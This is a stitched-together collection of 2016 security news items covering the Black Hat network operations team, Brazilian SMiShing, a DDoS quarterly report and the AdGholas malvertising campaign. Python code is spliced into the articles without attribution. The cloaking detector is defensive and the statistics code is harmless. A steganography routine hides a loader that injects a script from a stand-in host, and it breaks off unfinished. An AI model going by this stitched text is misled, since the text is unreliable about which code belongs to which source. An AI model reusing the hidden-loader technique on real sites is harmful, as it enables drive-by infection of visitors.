As a longtime contributor to internet standards on DNS and related issues, he continues to participate in a variety of efforts, including source address validation; the OpSec Trust initiative, which is building a trusted, vetted security community for sharing information, and internet governance, including the controversial discussion around route name service. While all three of our finalists are deserving of special recognition, we feel that Paul Vixie’s contributions to innovation at his company, to enterprise security, and to internet security worldwide earn him this award.” Our congratulations to all of this year’s Dark Reading Best of Black Hat Awards winners! Tim Wilson is Editor in Chief and co-founder of Dark, UBM Tech's online community for information security professionals. He is responsible for managing the site, assigning and editing content, and writing breaking news stories. Wilson has been recognized as one ...

Meet The BlackHat NOC People Who Let Malware Roam Free

It's not cool to kill a demo, but you can watch all the pr0n you want

Black Hat Neil Wyler and Bart Stump are responsible for managing what is probably the world’s most-attacked wireless network. The two friends, veterans among a team of two dozen, are at the time of writing knee deep in the task of running the network at Black Hat, the security event where the world reveals the latest security messes. The event kicks off with three days of training, then unleashes tempered anarchy as the conference proper gets under way. Wyler, better known as Grifter (@grifter801), heads the network operations centre (NoC) at Black Hat, an event he has loved since he was 12 years old. “I literally grew up among the community,” he says. Bart (@stumper55) shares the job. Wyler's day job is working for RSA's incident response team while Stumper is an engineer with Optiv, but their Black Hat and DEF CON experience trumps their professional status. Wyler has worked with Black Hat for 14 years and DEF CON for 17 years, while Stump has chalked up nine years with both hacker meets. Together with an army of capable network engineers and hackers they operate one of the few hacker conference networks that delegates and journalists are officially advised to avoid. Rightly so; over the next week the world’s talented hacker contingent will flood Las Vegas for Black Hat and DEF CON, the biggest infosec party week of the year.

The diverse talents – and ethics – of the attending masses render everything from local ATMs to medical implants potentially hostile and not-to-be-trusted. Some 23 network and security types represent the network operations centre (NoC) and are responsible for policing the Black Hat network they help create.

Come August each member loosens the strict defensive mindset they uphold in their day jobs as system administrators and security defenders to let the partying hackers launch all but the nastiest attacks over their network. “We will sit back and monitor attacks as they happen," Wyler tells The Register from his home in the US. "It's not your average security job."

The Black Hat NoC. Image: supplied.

The crew works in rotating shifts with the conference din as a background, sometimes punctuated by cheers as speakers pull off showy hacks or offer impressive technical demos.
In the NoC, some laugh, some sleep, and all work in a pitch broken by the glow of LEDs and computer screens.

Their score is a backdrop of crunching cheese Nachos, old hacker movies, and electronic music. "Picture it in the movies, and that's what it's like," Stump says, commiserating with your Australia-based scribe's Vegas absence; "it'll be quite a sight, you'll be missing something". Delegates need not.

The NoC will again be housed in The Fish Bowl, a glass den housing the crew and mascots Lyle the stuffed ape and Helga the inflatable sheep.

Delegates are welcome to gawk.

Risky click

The NoC operators at Black Hat and DEF CON need to check their defensive reflexes at the door in part to allow a user base consisting almost entirely of hackers to pull pranks and spar, and in part to allow presenters to legitimately demonstrate the black arts of malware. "When you see traffic like that, you immediately go into mitigation mode to respond to that threat," Wyler says. "Black Hat is a very interesting network because you can't do that - we have to ask if we are about to ruin some guy's demonstration on stage in front of 4000 people". Stump recalls intruding on a training session in a bid to claim the scalp of a Black Hat found slinging the infamous Zeus banking trojan. "The presenter says 'it's all good, we are just sending it up to AWS for our labs' and we had a laugh; I couldn't take the normal security approach and simply block crazy shit like this." Flipping malware will get you noticed and monitored by one of the NoC's eager operators who will watch to see if things escalate beyond what's expected of a normal demonstration. If legitimate attacks are seeping out of a training room, the sight of Wyler, Stump, or any other NoC cop wordlessly entering with a walkie-talkie clipped to hip and a laptop under arm is enough for the Black Hat activity to cease. "It is part of the fun for us," Wyler says. "Being able to track attacks to a location and have a chat." Targeting the Black Hat network itself will immediately anger the NoC, however. The team has found all manner of malware pinging command and control servers over its network, some intentional, and some from unwittingly infected delegates. "We'll burst in and say anyone whose MAC address ends with this, clean up your machine," Stump says.

$4000 smut-fest

Training is by far the most expensive part of a hacker conference. Of the 71 training sessions running over the weekend past ahead of the Black Hat main conference, each cost between US$2500 (£1887, A$3287) and US$5300 (£4000, A$6966) with many students having the charge covered by generous bosses.

Bart and the blow up doll cameo on CNN Money.

So it was to this writer's initial incredulity that most of the sea of "weird porn" flowing through the Black Hat pipes stems from randy training students. "It is more than it should ever be," Wyler says of the Vegas con's porn obsession. "While you are at a training class - I mean it's not even during lunch." The titillating tidbit was noticed when one NoC cop hacked together a script to pull and project random images from the network traffic on Fish Bowl monitors.

A barrage of flesh sent the shocked operators into laughing fits of ALT-TAB.

Another moment was captured when Stump was filmed for CNN Money and a shopper's blow up doll appeared with perfect timing.

Balancing act

Black Hat's NoC started as an effective but hacked-together effort by a group of friends just ahead of the conference.

Think Security Onion, intrusion detection running on Kali, and OpenBSD boxes. Now they have brought on security and network muscle, some recruited from a cruise through the expo floor, including two one-gigabit pipes from CenturyLink with both running about 600Mbps on each. "We were used to being a group of friends hanging out where a lot of stuff happened on site, and now we've brought in outsiders," Stump says. Ruckus Wireless, Fortinet, RSA and CenturyLink are now some of the vendors that help cater to Black Hat's more than 70 independent networks. "It's shenanigans," Wyler says. "But we love it." The pair do not and cannot work on the DEF CON networks since they are still being built during Black Hat, but they volunteer nonetheless, leading and helping out with events, parties, and demo labs.

"I feel a responsibility to give back to the community which feeds me," Wyler says. "That's why we put in the late nights." ®

SMiShing and the rise of mobile banking attacks

Brazilian cybercriminals are clearly setting their sights on users of mobile banking, with a huge rise in incidents registered in the country over the last two years.
In order to carry out these attacks they are using SMiShing (phishing via SMS) and registering new mobile phish domains created especially for this purpose. In 2015, mobile banking usage in Brazil reached 11.2 billion transactions, an increase of 138% compared to the 4.7 billion transactions registered in 2014. Mobile banking is now the second most popular channel for accessing a bank account in the country – there are more than 33 million active accounts, according to the Brazilian Federation of Banks.
Such numbers and the possibility of cheaply sending SMS messages are very attractive to cybercriminals, who are investing their time and effort to create new attacks. Getting started doesn’t require that much money or preparation: first they need to register a domain (usually a .mobi domain), prepare a phishing page in mobile format, hire a bulk SMS service (as cheap as 2 cents per message sent, and generally paid for with a cloned credit card) and voilà! Getting the telephone numbers of the victims isn’t a problem either: huge databases of mobile numbers can easily be purchased on the Brazilian underground, or can be captured in attacks using WhatsApp as bait.

The SMiShing messages inform recipients about a credit card or a bank account that has supposedly been blocked, and always include a link:

“Your data is outdated, your account may be blocked. Please update at <phish URL>” – an SMiShing message sent by phishers

Why target users of mobile banking? Because it’s easier to hack a bank account when accessed from a mobile terminal instead of a desktop. We’ve listed some of the reasons for that below:

- No protection: most smartphone users in Brazil still don’t use a dedicated AV on their phones. A survey performed by B2B International in 2015 showed only 56% of smartphone owners around the world do so.
- No security plugins: unlike desktops, most banks still don’t require the installation of a security plugin on user devices, despite most banks offering dedicated access via their mobile apps. Furthermore, fake mobile banking apps from Brazilian banks have also been found in the Play Store. When a criminal decides to phish a mobile banking user, it’s more effective if the attack is compatible with any mobile browser.
- Simple authentication: most Brazilian banks use very simple authentication on mobile devices, usually just asking for the account number and a six-digit password.
- Common SMS usage: it’s very common for banks in Brazil to send notifications via SMS. When you buy something or withdraw money from your account, you’ll receive an SMS confirming the operation. This approach has allowed Brazilian banks to decrease the number of fraud cases, in particular because customers are aware of any fraud involving their credit cards or bank accounts as soon as it starts.

Confusing a SMiShing message with a legit SMS from your bank is very easy. The mobile versions of these phishing banking websites open correctly in the browser, facilitating the theft of user credentials.

The phishers’ tactic is to force the user to access the website via their mobile devices, and not from a desktop.
If the victim tries to access the phishing domain using their computer, the following message is displayed: “Service unavailable for desktops, only for mobile devices”

The phishing domain only shows its full content when access is made via a mobile browser. The cybercriminals create phishing pages for several banks, in an array of colors and styles. Most of the domains used in these attacks are using the .mobi TLD. We published a list of some of the domains we found here (if you’re an AV guy, block them!). It’s important to highlight one other thing: if access is made from an IP outside of Brazil, some domains will display nothing. It’s a method used by Brazilian phishers to keep their attacks alive for as long as possible, because if you don’t see it, you won’t block the domain. Users of our products, including the Safe Browser for iOS, Windows Phone and Android, and our Fraud Prevention solutions, are protected against mobile phishing and SMiShing attacks.
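One defensive check that follows from the behaviour just described (desktop browsers get a denial message, mobile browsers get the full page, and visitors from outside Brazil get nothing): fetch a suspected URL under different browser profiles and flag divergent responses. This is an added example, not Kaspersky's code; the User-Agent strings, the denial phrases and the sample responses are constructed, and the geo comparison assumes you can supply a response captured from a Brazilian vantage point alongside one captured from abroad.

```python
import urllib.request
from urllib.error import URLError

# User-Agent strings for the two browser profiles compared. Constructed
# examples, not strings taken from the original post.
PROFILES = {
    "desktop": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/48.0",
    "mobile": "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) Mobile Safari/537.36",
}

# Phrases that signal a page refusing desktop visitors. The English phrase is
# the one quoted in the post; live pages may use Portuguese wording, so this
# list is an assumption to be extended from real samples.
DENIAL_HINTS = ("unavailable for desktops", "only for mobile devices")

# Constructed responses in the shape the classifier expects: {profile: (status, body)}.
# "mobile_abroad" stands for the same mobile request made from a non-Brazilian IP.
SAMPLE_RESPONSES = {
    "desktop": (200, "<html><body>Service unavailable for desktops, only for mobile devices</body></html>"),
    "mobile": (200, "<html><body><form action='/login'>" + "<input name='f'>" * 40 + "</form></body></html>"),
    "mobile_abroad": (200, ""),
}


def fetch(url, user_agent, timeout=10):
    """Fetch a URL with a given User-Agent; returns (status, body) or (None, error)."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(200_000).decode("utf-8", "replace")
    except URLError as exc:
        return None, str(exc)


def _denies_desktop(body):
    text = body.lower()
    return any(hint in text for hint in DENIAL_HINTS)


def cloaking_indicators(responses):
    """Compare responses keyed by profile and return a list of indicator names.

    "desktop"/"mobile" are the same vantage point with different User-Agents;
    the optional "mobile_abroad" key is the mobile profile requested from
    outside Brazil, which lets the geo-fencing the post describes be flagged.
    """
    indicators = []
    desktop, mobile = responses.get("desktop"), responses.get("mobile")
    if desktop and mobile:
        d_status, d_body = desktop
        m_status, m_body = mobile
        # Explicit refusal for desktops that the mobile profile does not see.
        if _denies_desktop(d_body) and not _denies_desktop(m_body):
            indicators.append("desktop-denied")
        # Both served 200, but the desktop got a fraction of the mobile content.
        if d_status == 200 and m_status == 200 and len(d_body.strip()) < 0.25 * len(m_body.strip()):
            indicators.append("mobile-only-content")
    abroad = responses.get("mobile_abroad")
    if mobile and abroad:
        # Same mobile profile: content from Brazil, an empty 200 from abroad.
        if mobile[0] == 200 and abroad[0] == 200 and mobile[1].strip() and not abroad[1].strip():
            indicators.append("geo-fenced")
    return indicators


def check_url(url, fetcher=fetch):
    """Fetch the URL once per profile and classify. `fetcher` is injectable so
    the logic can be exercised offline with constructed responses."""
    responses = {name: fetcher(url, ua) for name, ua in PROFILES.items()}
    return cloaking_indicators(responses)


if __name__ == "__main__":
    # Offline run over the constructed sample; swap in fetch() for a live check.
    print(cloaking_indicators(SAMPLE_RESPONSES))
```

A flagged URL is a candidate for analyst review and blocklisting, not proof of phishing on its own, since legitimate mobile-first sites can also redirect desktops.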

Dark Reading Radio at Black Hat 2016: 2 Shows, 4 #BHUSA...

Even if you can't physically be at Black Hat USA 2016, Dark Reading offers a virtual alternative to engage with presenters about hot show topics and trends. Couldn’t make the trip? Not to worry.

Dark Reading editors over the last few weeks have interviewed key Black Hat figures and presenters to give you a taste of the show in two pre-recorded Dark Reading Radio episodes to be broadcast Wednesday Aug 3 and Thursday Aug 4. Here’s the lineup:

Dark Reading Radio at Black Hat 2016, Episode 1
Date/Time: Wednesday, August 03, 2016, 1:00 p.m. New York / 10:00 a.m. Las Vegas
Guests: Black Hat General Manager Steve Wylie & Bugcrowd Senior Director of Researcher Operations Kymberlee Price

In this episode, Editor In Chief Tim Wilson talks with Black Hat General Manager Steve Wylie about the many programs and sessions being offered at this week’s Black Hat USA conference, highlighting some of the show’s most important keynote addresses, hot topics in the briefings, and new programs built around security careers and startup companies. He also tells Tim what makes Black Hat a different type of information security event – from in-depth training to social functions that bring security pros together. In the second segment of the radio show, Kymberlee Price gives yours truly a behind-the-scenes look at how to build a security incident response team using crowdsourcing. Kymberlee is senior director of researcher operations at Bugcrowd. She’ll be offering some takeaways and tips from her Black Hat 16 briefing, Building a Product Security Incident Response Team: Learnings from the Hivemind, which she is presenting this week at the Mandalay Bay in Las Vegas.

Dark Reading Radio at Black Hat 2016, Episode 2
Date/Time: Thursday, August 04, 2016, 1:00 p.m. New York / 10:00 a.m. Las Vegas
Guests: Wesley McGrew, Director of Cyber Operations at Horne Cyber & Konstantin Berlin, Senior Research Engineer at Invincea Labs

In this special episode of Dark Reading Radio, Executive Editor Kelly Jackson Higgins talks to Wesley McGrew, director of cyber operations at Horne Cyber, about his research on hacking penetration testers, "Secure Penetration Testing Operations: Demonstrated Weaknesses In Learning Material And Tools." McGrew over the past few years has been examining vulnerabilities and security weaknesses in penetration testing tools, processes, and practices, and will release his homegrown Snagterpreter tool at Black Hat that allows an attacker to hijack, monitor, and alter traffic between the pen tester and his or her target/client. Capping things off is Sara Peters' interview with Konstantin Berlin, senior research engineer at Invincea Labs.

Berlin hones in on one of the key cybersecurity promises of machine learning (particularly "deep learning") for security analysis, with a focus on how to give organizations more information about unfamiliar code than simply "it's benign" or "it's malicious." His talk is "An AI Approach To Malware Similarity Analysis: Mapping The Malware Genome with a Deep Neural Network." Hope to see you in the radio studio on Wednesday and Thursday.

And if you can't make it this week, you can view the show in our archives at your convenience. (Registration is Required.) Marilyn has been covering technology for business, government, and consumer audiences for over 20 years. Prior to joining UBM, Marilyn worked for nine years as editorial director at TechTarget Inc., where she launched six Websites for IT managers and administrators supporting ...

Clinton Campaign To Hold Cybersecurity-Themed Fundraiser In Vegas

Cybersecurity experts to head event during the ongoing Black Hat hacker conference this week. Plagued by cybersecurity problems throughout its presidential campaign, Democratic nominee Hillary Clinton’s campaign will now be hosting a cybersecurity-themed charity event in Las Vegas this week, during the ongoing Black Hat cybersecurity conference, reports FedScoop. Heading the fundraiser panel will be Black Hat founder Jeff Moss, Harvard University professor Michael Sulmeyer, who heads Clinton’s cyber policy working group, and Cambridge Global Advisors chief Jake Braun, also strategic advisor to the Department of Homeland Security and the Pentagon on cybersecurity issues. Going by their experience in digital security, it is likely that Sulmeyer and Braun could find themselves with information protection responsibilities in the next administration, says FedScoop. The fundraiser comes close on the heels of a Clinton campaign breach in which the analytics data program it uses was compromised during the DNC hack. For more details, click here. Dark Reading's Quick Hits delivers a brief synopsis and summary of the significance of breaking news events.

For more information from the original source of the news item, please follow the link provided in this article.

How the Adoption of EDR Transforms a SOC's Effectiveness

Endpoint detection and response is helping take the headache out of responding to threats by providing visibility where most organizations are blind. Endpoint detection and response (EDR) is much more than a next-generation endpoint capability; it is a driving force of evolutionary change within security operations centers (SOCs) today.

EDR provides visibility where most organizations are blind.
In our network-centric world, EDR provides a fast path to endpoint context, enabling rapid identification of false positives or the origin of attacks. To illustrate this point, I created a litmus test to review common limitations in security information and event management (SIEM) and threat monitoring today.

Because most SIEMs have insufficient endpoint data, threat analysts struggle to answer even the most fundamental questions, such as:

- Is the attack targeting a critical, sensitive, or regulated asset?
- Does the identified exploit target the right operating system or application?

Nor can they answer the more complex questions, such as:

- What process executed a connection to the known malicious IP or URL?
- What occurred following the successful inbound attack?

Life without EDR

For organizations without EDR, researching and responding to threats is a maddening exercise. With limited access to endpoints or endpoint context, threat analysts -- particularly in large enterprises or managed security service providers (MSSPs) -- have few choices other than to open a ticket and delegate the research to others with access to the targeted machine. The stakeholder could be in another department or region.

For MSSPs, this is the heartbeat of communication between the SOC and customers under attack.

Tickets may be answered quickly but a large majority take days and weeks.
Some aren’t answered at all.
In fact, due to the substantial delays incurred, special tools have been created to address the holdup. One such tool is called alert suppression. Using alert suppression, mature SOCs can hide repetitive alerts while waiting for information requested from stakeholders. Another technique is to auto-notify and close tickets without response. Last but not least, it’s often easier to simply re-image the machine than to investigate root cause. This is the average day to day of threat analysts in the SOC.
It’s not sexy, nor is it cost effective. Repeated tens (if not hundreds) of times on a daily or weekly basis drives up organizational costs to an unsupportable level. When I hear people say: “I can’t afford to build or staff a SOC,” it’s not surprising given the status quo. Manual and human intensive tasks give security a bad name.

This is life without EDR.

Life with EDR

The introduction of EDR is a major evolution in SOC effectiveness.

Threat analysts no longer need to ask others to validate threats; the data is available for real-time query. With immediate access to the data, three incredible things happen:

- The SOC analyst can research and respond to alerts in rapid succession, dramatically increasing the volume of alerts they can handle.
- Armed with endpoint context, Tier 1 threat analysts can perform more sophisticated analysis, encroaching on the role typically assigned to Tier 2.
- By eliminating the high volume of tickets requesting context, MSSP customers or stakeholders of large enterprises are relieved of the deluge of inquiries.

Inevitably, a breach will occur. When that does happen, utilizing a best-in-class EDR vendor that includes continuous and centralized recording takes the guesswork out of incident response.

The attacker may have erased their tracks, but EDR recorded the attacker's every move with an endpoint DVR, the cyber equivalent of a surveillance camera. With a complete historical recording of an attacker and their actions, incident responders don’t need to fly to the scene of the crime, scrape RAM, or image machines to look for clues.

The full recorded history of the attack enables on-the-spot incident response. EDR is much more than an endpoint security product; it’s causing an evolution in the people and processes utilized within security operations centers globally.

And for individual corporations or customers who rely on MSSPs to deliver skills and expertise, EDR is a fundamental technology that is not optional. It’s a foundational requirement of the next-generation security operations center and the primary reason we’ll collapse the average ~250-day gap between attack initiation and discovery. John Markott is a Director of Product Management at Carbon Black. His mission is to help managed security service providers and incident-response firms ride the wave and reap the rewards of next-generation endpoint security. With nearly two decades of experience in InfoSec, ...

Kaspersky DDoS Intelligence Report for Q2 2016

Q2 events

DDoS attacks have had a major impact on cryptocurrency wallet services.
In the second quarter of 2016, two companies – CoinWallet and Coinkite – announced they were terminating their work due to lengthy DDoS attacks.

According to Coinkite’s official blog, the e-wallet service will be shut down, as well as its API.

The company admits that the decision was largely due to constant attacks and pressure from various governments who want to regulate cryptocurrency.

A piece of malware was detected that possesses worm functionality and builds a botnet of Linux-based routers (including Wi-Fi access points).
It spreads via Telnet.

An analysis of the worm’s code has shown that it can be used in various types of DDoS attacks.

Experts have registered a growing number of botnet C&C servers operating based on LizardStresser – a tool used to perform DDoS attacks.

The LizardStresser source code belongs to the hacker group Lizard Squad and was made publicly available at the end of 2015.

This is what led to the increase in the number of botnets using new versions of the tool.

Researchers discovered a botnet consisting of 25 000 devices, most of which are surveillance cameras.

According to the experts, 46% of the infected devices are H.264 DVR CCTV systems.

The other compromised devices were manufactured by ProvisionISR, Qsee, QuesTek, TechnoMate, LCT CCTV, Capture CCTV, Elvox, Novus, and MagTec CCTV.

A new botnet named Jaku, located mainly in Japan and South Korea, was detected. Researchers have stated that the botnet operators are focused on major targets: engineering companies, international organizations, scientific institutions.

A new modification of Cerber ransomware that uses an infected device to carry out DDoS attacks was discovered.

This cryptor Trojan sends UDP packets in which the sender address is replaced with the address of the victim.

A host that receives the packet sends a reply to the victim’s address.

This technique is used to organize a UDP flood, meaning that this Trojan, in addition to its basic ransomware functionality, also integrates the functionality of a DDoS bot.

Statistics for botnet-assisted DDoS attacks

Methodology

Kaspersky Lab has extensive experience in combating cyber threats, including DDoS attacks of various types and levels of complexity.

The company’s experts monitor botnet activity with the help of the DDoS Intelligence system. The DDoS Intelligence system (part of Kaspersky DDoS Protection) is designed to intercept and analyze commands sent to bots from command and control (C&C) servers, and does not have to wait until user devices are infected or cybercriminal commands are executed in order to gather data. This report contains the DDoS Intelligence statistics for the second quarter of 2016. In the context of this report, a single (separate) DDoS attack is defined as an incident during which any break in botnet activity lasts less than 24 hours.
If the same web resource was attacked by the same botnet after a break of more than 24 hours, this is regarded as a separate DDoS attack.

Attacks on the same web resource from two different botnets are also regarded as separate attacks. The geographic distribution of DDoS victims and C&C servers is determined according to their IP addresses.
In this report, the number of DDoS targets is calculated based on the number of unique IP addresses reported in the quarterly statistics. It is important to note that DDoS Intelligence statistics are limited to those botnets detected and analyzed by Kaspersky Lab.
It should also be noted that botnets are just one of the tools used to carry out DDoS attacks; therefore, the data presented in this report does not cover every DDoS attack that has occurred within the specified time period.

Q2 Summary

- Resources in 70 countries were targeted by DDoS attacks in Q2 2016.
- 77.4% of targeted resources were located in China.
- China, South Korea and the US remained leaders in terms of the number of DDoS attacks and number of targets.
- The longest DDoS attack in Q2 2016 lasted for 291 hours (or 12.1 days) – significantly longer than the previous quarter’s maximum (8.2 days).
- SYN DDoS, TCP DDoS and HTTP DDoS remain the most common DDoS attack scenarios.
- The proportion of attacks using the SYN DDoS method increased 1.4 times compared to the previous quarter.
- In Q2 2016, 70.2% of all detected attacks were launched from Linux botnets, which is almost double the figure for the first quarter.

Geography of attacks

In Q2 2016, the geography of DDoS attacks narrowed to 70 countries, with China accounting for 77.4% of attacks.
In fact, 97.3% of the targeted resources were located in just 10 countries.

The three most targeted countries remained unchanged: China, South Korea and the US.

Figure: Distribution of DDoS attacks by country, Q1 2016 vs. Q2 2016

This quarter's statistics show that 94.3% of unique attack targets were located in the 10 most targeted countries.

Figure: Distribution of unique DDoS attack targets by country, Q1 2016 vs. Q2 2016

Here too China was the leader: 71.3% of all unique targets were located in the country (vs. 49.7% in Q1). The growth in the proportion of attacks on Chinese resources resulted in a decline in the share of attacks on resources in the other TOP 10 countries: South Korea's share fell by 15.5 percentage points and the US share by 0.7 p.p. Russia left the TOP 5 after its share decreased by 1.3 p.p.; Vietnam took its place even though its own share was unchanged at 1.1%.

Germany and Canada both left the TOP 10 and were replaced by France (0.9%) and the Netherlands (0.5%).

Changes in DDoS attack numbers

DDoS activity was relatively uneven in Q2 2016, with a lull from late April until the end of May and two sharp peaks, on 29 May and 2 June.

The peak number of attacks in one day was 1,676, recorded on 6 June.

Figure: Number of DDoS attacks over time in Q2 2016 (DDoS attacks may last for several days; in this timeline the same attack is counted once for each day of its duration)

An analysis of the data for the first half of 2016 shows that, although the number of DDoS attacks remains uneven from day to day, a steady upward trend is evident.

Figure: Number of DDoS attacks, Q1 2016 – Q2 2016

In Q2, Tuesday was the most active day of the week for DDoS attacks (15.2% of attacks), followed by Monday (15.0%).

Thursday, which came second in Q1, fell one place (-1.4 p.p.), and Sunday became the quietest day of the week (13.0% of attacks).

Figure: Distribution of DDoS attack numbers by day of the week

Types and duration of DDoS attacks

The ranking of the most popular attack methods remained unchanged from the previous quarter.

The SYN DDoS method has further strengthened its position as leader: its share increased from 54.9% to 76%.

The proportions of the other attack types decreased slightly, except for UDP DDoS, whose share grew by 0.7 p.p. These small fluctuations did not affect the order of the TOP 5.

Figure: Distribution of DDoS attacks by type

The growth in the popularity of SYN DDoS is largely explained by the fact that, during the second quarter of 2016, 70.2% of all detected attacks came from Linux botnets.

This was the first time in a number of quarters that there had been such an imbalance between the activity of Linux- and Windows-based DDoS bots; previously, the difference had not exceeded 10 percentage points. Linux bots are the more suitable tool for SYN DDoS: a bot running with root privileges on Linux can use raw sockets to emit SYN packets with spoofed source addresses at a high rate, whereas Windows has restricted sending TCP over raw sockets since XP SP2.

Figure: Correlation between attacks launched from Windows and Linux botnets

Attacks lasting no more than four hours remained the most common, although their share decreased from 67.8% in Q1 to 59.8% in Q2 2016.

At the same time, the proportion of longer attacks increased considerably: attacks lasting 20-49 hours accounted for 8.6% (vs. 3.9% in the first quarter) and those lasting 50-99 hours for 4% (vs. 0.8%). The longest DDoS attack in the second quarter of 2016 lasted 291 hours, significantly exceeding the Q1 maximum of 197 hours.

Figure: Distribution of DDoS attacks by duration (hours)

C&C servers and botnet types

In Q2, South Korea remained the clear leader in terms of the number of C&C servers located on its territory, with its share amounting to 69.6%, a 2 p.p. increase on the first quarter of 2016.
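Two of the views above depend on conventions that are easy to miss when reproducing them: the per-day timeline counts a multi-day attack once on every day it spans (so the daily totals sum to more than the number of attacks), and the duration chart bins attacks by whole hours. The following is an added example written for this page, not Kaspersky's code, that builds both views from a list of attacks. The attack records are constructed, and the bin edges other than "no more than four hours", "20-49" and "50-99" (the ones the text names) are assumed.

```python
"""Per-day timeline and duration distribution over a list of DDoS attacks.

Added example for this page, not Kaspersky's code. SAMPLE_ATTACKS is
constructed; only three of the duration bins are named in the report text,
the remaining edges are assumed.
"""
from collections import Counter
from datetime import datetime, timedelta

# Constructed attacks: (first observed command, last observed command).
SAMPLE_ATTACKS = [
    (datetime(2016, 6, 1, 10), datetime(2016, 6, 1, 13)),  # 3 h
    (datetime(2016, 6, 1, 22), datetime(2016, 6, 2, 1)),   # 3 h, crosses midnight
    (datetime(2016, 6, 2, 8), datetime(2016, 6, 3, 20)),   # 36 h
    (datetime(2016, 6, 3, 0), datetime(2016, 6, 5, 12)),   # 60 h
]

# (upper bound in whole hours, label); None = open-ended last bin.
DURATION_BINS = [(4, "<=4h"), (19, "5-19h"), (49, "20-49h"),
                 (99, "50-99h"), (None, "100h+")]


def attacks_per_day(attacks):
    """Count attacks per calendar day (ISO date -> count).

    A multi-day attack is counted once on each day it spans, the convention
    stated under the report's timeline figure, so the values sum to more than
    len(attacks) whenever any attack crosses midnight.
    """
    counts = Counter()
    for start, end in attacks:
        day = start.date()
        while day <= end.date():
            counts[day.isoformat()] += 1
            day += timedelta(days=1)
    return dict(sorted(counts.items()))


def peak_day(attacks):
    """(ISO date, count) of the busiest day; ties go to the earliest day."""
    counts = attacks_per_day(attacks)
    day = max(counts, key=lambda d: counts[d])  # first maximum in date order
    return day, counts[day]


def duration_hours(start, end):
    return (end - start).total_seconds() / 3600


def duration_bin(hours):
    """Bin by whole hours; truncation to whole hours is an assumption."""
    whole = int(hours)
    for upper, label in DURATION_BINS:
        if upper is None or whole <= upper:
            return label


def duration_distribution(attacks):
    """Share of attacks (percent, one decimal) in each duration bin."""
    counts = Counter(duration_bin(duration_hours(s, e)) for s, e in attacks)
    total = len(attacks)
    return {label: round(100 * counts[label] / total, 1) for _, label in DURATION_BINS}


def longest_attack_hours(attacks):
    return max(duration_hours(s, e) for s, e in attacks)


if __name__ == "__main__":
    print("per day:", attacks_per_day(SAMPLE_ATTACKS))
    print("peak:", peak_day(SAMPLE_ATTACKS))
    print("by duration:", duration_distribution(SAMPLE_ATTACKS))
    print("longest (h):", longest_attack_hours(SAMPLE_ATTACKS))
```

On the constructed input, four attacks produce eight attack-days across five calendar days, which is why the timeline figure's daily totals cannot simply be added up to get the quarter's attack count. The duration view puts half of the attacks in the "no more than four hours" bin and one each in 20-49 and 50-99 hours.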

The TOP 3 countries hosting the most C&C servers (84.8% between them) remained unchanged, while Brazil (2.3%), Italy (1%) and Israel (1%) all entered the TOP 10.

Figure: Distribution of botnet C&C servers by country in Q2 2016

As in previous quarters, 99.5% of DDoS targets in Q2 2016 were attacked by bots belonging to a single family; attacks using bots from two different families (controlled by one or more botnet masters) accounted for just 0.5% of cases.

The most popular families of the quarter were Xor, Yoyo and Nitol.

Conclusion

The second quarter of 2016 saw cybercriminals paying close attention to financial institutions working with cryptocurrency. Several of these organizations cited DDoS attacks as the reason for ceasing their activities. Intense competition leads to the use of unfair methods, one of which is DDoS attacks.

The attackers' strong interest is due to a particular feature of the businesses involved in processing cryptocurrency: not everyone is happy about the lack of regulation of cryptocurrency turnover.

Another trend is the use of vulnerable IoT devices in botnets that launch DDoS attacks. In one of our earlier reports we wrote about the emergence of a botnet consisting of CCTV cameras, and the second quarter of 2016 saw continued interest in such devices among botnet operators. It is possible that by the end of this year the world will have heard about even more “exotic” botnets built from vulnerable IoT devices.

AdGholas Malvertising Campaign Scam Smashed

SECURITY OUTFIT PROOFPOINT has made its point again and uncovered a thing called AdGholas, which it warned is a pretty damn significant malvertising campaign. The firm has already smashed the campaign into the ground, thanks to work with service providers and fellow security company Trend Micro. The campaign was used by three groups, and a number of websites were affected by the placement of infected adverts.

A Proofpoint blog post explained that victims included the Belfast Telegraph and a French hotel. "Proofpoint researchers have discovered and analysed a massive malvertising network operating since 2015, run by a threat actor we designated as AdGholas and pulling in as many as one million client machines per day," the firm said. "This malvertising operation infected thousands of victims every day using a combination of techniques including sophisticated filtering and steganography, as analysed by fellow researchers at Trend Micro.

"While AdGholas appears to have ceased operation in the wake of action by advertising network operators following notification by Proofpoint, the scale and sophistication of this operation demonstrate the continued evolution and effectiveness of malvertising."

Proofpoint does a lot of this sort of thing, and just recently cast a dark light over Pokémon. AdGholas might seem like any other old malvertising whack but is a bit of a pioneer in that it is the first such campaign to use steganography in drive-by malware attacks. "This campaign represents the first documented use of steganography in a drive-by malware campaign, and the attacks employed ‘informational disclosure' bugs perceived to be low risk to stay below the radar of vendors and researchers," Proofpoint said. AdGholas also used evasive tactics to avoid discovery and suspicion, and redirected to or mimicked legitimate sites when under close inspection.
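To make the steganography point concrete, here is an added example of the technique class Proofpoint and Trend Micro describe: least-significant-bit (LSB) steganography that hides a script inside ordinary-looking image data. It is illustrative code written for this page, not AdGholas's actual encoding and not Proofpoint or Trend Micro code. The cover image is a constructed raw RGB sample buffer (no PNG container, so no image library is needed), and the hidden payload is a made-up one-line loader script. The interesting property for defenders is checked at the end: no sample changes by more than one unit and the payload never appears contiguously in the served bytes, so a signature scan of the image asset has nothing to match.

```python
"""LSB steganography: hide a script in image sample data and recover it.

Added example for this page; not AdGholas's encoding, nor Proofpoint or
Trend Micro code. COVER is a constructed raw RGB buffer and PAYLOAD a
made-up loader, so everything runs offline without image libraries.
"""
import random

WIDTH, HEIGHT = 64, 64
# Constructed "cover image": 8-bit RGB samples from a seeded generator.
_rng = random.Random(2016)
COVER = bytes(_rng.randrange(256) for _ in range(WIDTH * HEIGHT * 3))

# Constructed stand-in for a hidden second-stage script (not real AdGholas code).
PAYLOAD = b"var s=document.createElement('script');s.src='//example.invalid/x.js';"


def capacity_bytes(cover):
    """One payload bit per sample, so len(cover) // 8 bytes."""
    return len(cover) // 8


def embed(cover, payload):
    """Write a 4-byte big-endian length header plus payload, MSB first,
    into the least-significant bit of consecutive samples."""
    data = len(payload).to_bytes(4, "big") + payload
    if len(data) > capacity_bytes(cover):
        raise ValueError("payload too large for cover")
    out = bytearray(cover)
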